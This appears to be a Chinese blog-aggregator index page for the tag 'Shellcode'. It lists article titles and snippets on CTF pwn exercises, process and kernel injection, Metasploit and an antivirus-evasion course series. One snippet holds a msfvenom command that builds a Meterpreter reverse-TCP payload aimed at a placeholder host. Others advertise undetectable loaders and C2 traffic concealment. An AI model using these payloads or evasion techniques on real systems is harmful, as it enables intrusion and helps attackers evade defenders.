Shellcode

通过gdb调试探寻函数调用时栈的变化

先来一个链接,讲gdb调试讲的很好~https://deepzz.com/post/gdb-debug.html这个是接上一篇讲shellcode的,我觉得得先理解了函数调用时栈的变化,才能对其进行进一步的漏洞利用
五月的天气·2023-08-24 22:57

远程线程注入(简单样例以及原理)

远程线程注入(简单样例以及原理)注入的目标是将我们的代码注入到目标进程的地址空间中注入通常可以根据注入的内容分为两种类型:shellcode注入:这种注入是将我们的代码直接注入到目标内存中,这就要保证我们的代码在贴到其他地址上后仍然能够正常执行
ch132·2023-08-21 08:30

深入了解msfconsole功能详解

同时进行偶尔的exp修改,这就是初期对于msf的使用,以至于我认为这款工具仅此而已,直到在分析一个格式化字符串漏洞的时候,当然cve编号已经记不清了,接触到了纯字符这个概念,随后查阅各种资料,手动去除坏字符,在线shellcode
极安御信安全研究院·2023-08-17 20:36

Metasploit(MSF)

是一款开源安全漏洞利用和测试工具,集成了各种平台上常见的溢出漏洞和流行的shellcode,并持续保持更新。
BRAVE_YAYA·2023-08-17 19:27

【Windows系统编程】03.远线程注入ShellCode

shellcode:本质上也是一段普通的代码,只不过特殊的编程手法,可以在任意环境下,不依赖于原有的依赖库执行。
WdIg-2023·2023-08-16 07:50

WPS-0DAY-20230809的分析和利用复现

WPS-0DAY-20230809的分析和初步复现一、漏洞学习1、本地复现环境过程2、代码解析1.htmlexp.py3、通过修改shellcode拿shell曲折的学习msf生成sc二、疑点1、问题2
这周末在做梦·2023-08-16 04:47

XSS漏洞详解

目录壹、XSS概述贰、XSS类型叁、XSS代码构造肆、XSS变形绕过伍、Shellcode的调用陆、XSS防御与会话劫持1.XSS防御2.劫持柒、XSS实战通关游戏壹、XSS概述1、XSS原理:XSS被称为跨站脚本
XiaozaYa·2023-08-15 06:48

[源码和文档分享]根据PE文件格式从导入表中获取加载的DLL并遍历导入函数名称和地址

理解了PE格式的导出表,可以不需要WIN32API函数就可以根据DLL加载基址定位出导出函数的名称和导出函数的地址,这在SHELLCODE的编写中,比较重要。本文主要介绍导入表。给
ggdd5151·2023-08-13 01:36

APT之木马动态免杀绕过Windows Defender

环境安装c++编译环境apt-getinstallg++-mingw-w64-x86-64简单的演示一串简单的将shellcode加载入windows内存执行的c++代码#include#includeintmain
Ba1_Ma0·2023-08-12 21:34

木马免杀(篇二)shellcode 学习

木马免杀(篇二)shellcode学习——shellcode介绍shellcode是一段利用软件漏洞进行执行的机器码,通常用汇编语言编写并被翻译为十六进制操作码,因常被攻击者用于获取系统的命令终端shell
Goodric·2023-08-12 02:48

Charlotte:完全不会被检测到的Shellcode启动器

关于CharlotteCharlotte是一款基于C++实现的Shellcode启动器,并且完全不会被安全解决方案所检测到。
东方睡衣·2023-08-10 00:16

简单的PWN学习-ret2shellcode

最近笔者开始钻研pwn的一些知识,发现栈溢出真的非常的有意思,于是经过一个多礼拜的学习,终于是把2016年的一道CTF题给看明白了了,首先我们学习一下前置技能0x01shellcode首先简单看一下shellcode
vlan911·2023-08-08 21:40

使用alpha3生成alphanumeric shellcode

0x00背景之前打杭电新生赛hgame的时候碰到一个题目,题目会检测用户输入的shellcode,限制shellcoode只能是大写字母和数字,经社团大佬提醒得知对付这种问题用一个专门的工具:alpha3
pu1p·2023-08-05 18:41

Windows内核-注入技术(无痕注入)

以劫持线程的方式实现无模块注入无痕注入:1.没有线程2.申请的内存是没有痕迹(你让游戏保护查不到你的内存)3.没有模块信息1.整合劫持线程代码2.构建shellcode3.劫持RIP4.抹去PE标记5.
游戏逆向·2023-08-05 06:38

第119天:免杀对抗-二开CS&Shellcode函数修改&生成模版修改&反编译重打包(下)

知识点#知识点:1、CS-表面特征消除2、CS-HTTP流量特征消除3、CS-Shellcode特征消除#章节点:编译代码面-ShellCode-混淆编译代码面-编辑执行器-编写编译代码面-分离加载器-
Ch4ser·2023-08-04 21:17

第120天:免杀对抗-防朔源&防流量&防特征&CDN节点&SSL证书&OSS存储&上线

知识点#知识点:1、CS-CDN节点-防拉黑2、CS-SSL证书-防特征3、CS-OSS存储-防流量#章节点:编译代码面-ShellCode-混淆编译代码面-编辑执行器-编写编译代码面-分离加载器-编写程序文件面
Ch4ser·2023-08-04 21:17

字符串溢出(pwn溢出)--ret2shellcode

ret2shellcode,即控制程序执行s
莫慌搞安全·2023-08-02 18:35

【逆向】软件漏洞shellcode

文章目录简单shellcode简单shellcode存在的问题优化shellcodeshellcode调试寻找溢出点位置的方法shellcode瘦身简单shellcode简单shellcode存在的问题利用
过动猿·2023-07-28 12:15

第117天:免杀对抗-反VT沙盒&反虚拟机&反调试&进程APC注入&项目保护

知识点#知识点:1、反VT-沙盒检测-Go&Python&C++2、反调试-调试检测&进程注入-C++3、反VT反调试-程序保护-工具项目类#章节点:编译代码面-ShellCode-混淆编译代码面-编辑执行器
Ch4ser·2023-07-25 00:50

第116天:免杀对抗-EDR&Syscall-hook&DLL反射注入&白加黑&隐写分离&加载器

知识点#知识点:1、DLL劫持-自写&导入2、DLL劫持-重写&分离3、syscall-底层&项目#章节点:编译代码面-ShellCode-混淆编译代码面-编辑执行器-编写编译代码面-分离加载器-编写程序文件面
Ch4ser·2023-07-25 00:49

第115天:免杀对抗-特征码定位&添加花指令&加冷门壳&加反VT保护&资源修改

知识点#知识点:1、特征码扫描-花指令&定位修改2、文件检验法-资源修改&加签名3、沙盒检测法-冷门壳&代码运行保护#章节点:编译代码面-ShellCode-混淆编译代码面-编辑执行器-编写编译代码面-
Ch4ser·2023-07-25 00:19

第110天:免杀对抗-GO&C#&反VT沙盒&逆向调试&参数加载&资源分离&混淆加密

知识点#知识点:1、C#-混淆&分离&反调试2、GO-混淆&分离&反调试3、成品程序-包含反调试VT#章节点:编译代码面-ShellCode-混淆编译代码面-编辑执行器-编写编译代码面-分离加载器-编写程序文件面
Ch4ser·2023-07-25 00:43

第112天:免杀对抗-加载器分离&无文件落地&图片隐写&SOCK管道&参数协议化

知识点#知识点:1、无文件落地&分离拆分-将shellcode从文本中提取-file2、无文件落地&分离拆分-将shellcode与加载器分离-argv3、无文件落地&分离拆分-将shellcode远程协议加载
Ch4ser·2023-07-22 01:22

第113天:免杀对抗-内存加载&API封装&UUID标识&MAC地址&IPV4地址&各语言

知识点#知识点:1、内存加载-UUID地址-ShellCode转换2、内存加载-MAC地址-ShellCode转换3、内存加载-IPV4地址-ShellCode转换#章节点:编译代码面-ShellCode
Ch4ser·2023-07-22 01:22

107-免杀对抗-C&C++&溯源ShellCode上线&混淆变异算法&回调编译执行

知识点#知识点:1、ShellCode-分析&朔源&感知2、ShellCode-混淆&编码&算法3、回调执行解析-API&汇编&句柄#章节点:编译代码面-ShellCode-混淆编译代码面-编辑执行器-
Ch4ser·2023-07-22 01:52

第111天:免杀对抗-Java&ASM&汇编CS调用&内联C&MSF源码特征修改&Jar打包

知识点#知识点:1、ASM-CS-单汇编&内联C2、JAVA-MSF-源码修改&打包#章节点:编译代码面-ShellCode-混淆编译代码面-编辑执行器-编写编译代码面-分离加载器-编写程序文件面-特征码定位
Ch4ser·2023-07-22 01:52

第108天:免杀对抗-Python&混淆算法&反序列化&打包生成器&Py2exe&Nuitka

知识点#知识点:1、Python-对执行代码做文章2、Python-对shellcode做文章3、Python-对代码打包器做文章#章节点:编译代码面-ShellCode-混淆编译代码面-编辑执行器-编写编译代码面
Ch4ser·2023-07-22 01:50

红队打靶:Brainpan打靶思路详解(vulnhub)

目录写在开头第一步:主机发现和端口扫描第二步:web渗透第三步:缓冲区溢出漏洞识别第四步:定位eip寄存器(确定溢出字符串的长度)第五步:ESP扩容(判断ESP寄存器的大小是否够装shellcode)第六步
Bossfrank·2023-07-18 09:56

深入理解Shellcode混淆加密技术

前言一、Shellcode简介二、Shellcode混淆技术三、常见的Shellcode加密技术四、Shellcode解密和执行<
0xThrL·2023-07-17 21:30

Shellcode免杀技术的探索与应对策略

最近在学免杀的顺道了解一些知识文章目录前言一、Shellcode免杀技术的原理二、常见的Shellcode免杀策略三、应对策略
0xThrL·2023-07-17 21:29

Havoc!新的开源命令和控制C2框架

公众号,回复关键字【230618】获取下载链接Havoc包含各种各样的模块,允许渗透测试人员(和黑客)在被利用的设备上执行各种任务,包括执行命令、管理进程、下载额外的有效负载、操作Windows令牌和执行shellcode
潇湘信安·2023-07-17 09:59

4.9 x64dbg 内存处理与差异对比

LyScript插件中针对内存读写函数的封装功能并不多,只提供了最基本的内存读取和内存写入系列函数的封装,本章将继续对API接口进行封装,实现一些在软件逆向分析中非常实用的功能,例如ShellCode代码写出与置入
微软安全技术分享·2023-07-16 15:09

渗透测试常用术语总结

1.POC、EXP、Payload与ShellcodePOC:全称'ProofofConcept',中文'概念验证',常指一段漏洞证明的代码。
L世界凌乱了·2023-07-13 16:43

CTFshow-pwn入门-前置基础pwn23-pwn25

pwn23-25的题目会涉及到ret2shellcode、ret2libc等内容,本篇文章只会侧重研究这几道题目的wp,不会过多涉及到ret2shellcode、ret2libc的基本原理,等有时间再来写关于
T1ngSh0w·2023-06-21 10:51

CTFshow-pwn入门-前置基础pwn26-pwn28

什么是ASLR大多数的攻击都基于这样一个前提,即攻击者知道程序的内存布局,需要提前知道shellcode或者其他一些数据的位置。
T1ngSh0w·2023-06-21 10:18

pwn — ret2syscall

ret2syscall再来check一下保护,发现开了NX这次我先看一下应该填充的字符串长度为多少,爆出来发现是112然后在Ida里看main发现这是个nosystem又noshellcode的题,然后又开了
YeeZi_·2023-06-21 05:51

0002-TIPS-2020-hxp-kernel-rop : bypass-smep-with-rop

在没有开启SMEP的情况下,攻击者将rip或者函数指针指向了用户空间,可在用户空间布局shellcode,从而提权。
goodcat666·2023-06-18 23:04

内核线程注入(x64)

经过自己修改后做成的Demo,功能主要通过Ring0层驱动Attach到目标进程(目标进程可以是32位进程也可以是64位进程,使用不同的ShellCode进行注入操作),然后调用NtCreateThreadEx
拉塞尔·2023-06-18 00:46

驱动开发:内核ShellCode线程注入

《驱动开发:内核LoadLibrary实现DLL注入》中所使用的注入技术吗,我们通过RtlCreateUserThread函数调用实现了注入DLL到应用层并执行,本章将继续探索一个简单的问题,如何注入ShellCode
王 瑞·2023-06-18 00:13

总结加载Shellcode的各种方式(更新中!)

1.内联汇编加载使用内联汇编只能加载32位程序的ShellCode,因为64位程序不支持写内联汇编#pragmacomment(linker,"/section:.data,RWE")//将data段的内存设置成可读可写可执行
Henry404s·2023-06-17 07:26

驱动开发:内核ShellCode线程注入

驱动开发:内核LoadLibrary实现DLL注入》`中所使用的注入技术吗,我们通过`RtlCreateUserThread`函数调用实现了注入DLL到应用层并执行,本章将继续探索一个简单的问题,如何注入`ShellCode
lyshark·2023-06-14 09:00

【pwn-栈溢出】— ret2shellcode

目录ret2shellcode0x1、程序信息0x2、检查保护0x3、寻找溢出点0x4、计算溢出偏移0x5、验证bss段可执行0x6、编写exp脚本ret2shellcode0x1、程序信息描述内容程序名称
小朋友呢·2023-06-09 05:50

CTF-PWN笔记(一)-- 栈溢出 之 基础ROP

文章目录栈linux内存布局原理文件保护机制CanaryNX(DEP)PIE(ASLR)RELROROPret2txtret2shellcoderet2syscallret2libc栈栈是一种典型的后进先出
Chiaki_0ff·2023-06-09 05:47

pwn基础之ctfwiki-栈溢出-基础ROP-ret2shellcode

文章目录前言原理ret2shellcode挖掘漏洞利用漏洞利用脚本(exp)总结前言二进制小白的学习记录,是自己写的第二篇文章,相较于第一篇文章我也做了一些改进,希望会越来越好。
大能猫能·2023-06-09 05:17

pwn(2)-栈溢出下

32位shellcode编写不同内核态操作通过给寄存器设置不同的值,在调用指令int80h,就可以通知内核完成不同的功能。
NEFU-XingKong·2023-06-09 05:45

Python-shellcode免杀分离

#Python-原生态-MSF&CS&生成&执行代码MSF-payload:msfvenom-pwindows/meterpreter/reverse_tcplhost=X.X.X.Xlport=6688-fcCS-payload:攻击--生成后门--payload生成器--选择监听器和输出格式为C语言python3.10-32位,注意python解释器一定要切换为32位importctypess
大飞先生·2023-06-08 12:53

Metasploit payloads模块理解

文章目录一、payloads的使用二、payload是什么payloadshellcode的编写三、MSF的Payloads模块payload分类payload的投递四、MSF模块功能参考一、payloads
藤原千花的败北·2023-04-20 21:43

2023 广东海洋大学 GDOUCTF Writeup By AheadSec

PwnEASYPWNezshellcode真男人下120层RANDOMCryptoAbsolute_Baby_Encrytpion
末初mochu7·2023-04-20 13:03

BUUCTF-PWN-[第五空间2019 决赛]PWN5

这题考到格式化字符串的方法我之前没有学过根据wp写完这题去看看原理下载打开环境checksec看看发现有三个保护nx打开所以无法写入shellcode现在看看ida32发现/bin/sh进去看发现就在主函数里面我们进行代码审计发现输入名字他会返回名字然后再输入密码如果密码和
双层小牛堡·2023-04-20 10:17

SROP学习 smallest & ciscn_s_3

SigreturnOrientedProgramming)于2014年被VrijeUniversiteitAmsterdam的ErikBosman提出,其相关研究FramingSignals—AReturntoPortableShellcode
Red-Leaves·2023-04-18 05:34
上一页 1 2 3 4 5 6 7 8 下一页
按字母分类: ABCDEFGHIJKLMNOPQRSTUVWXYZ其他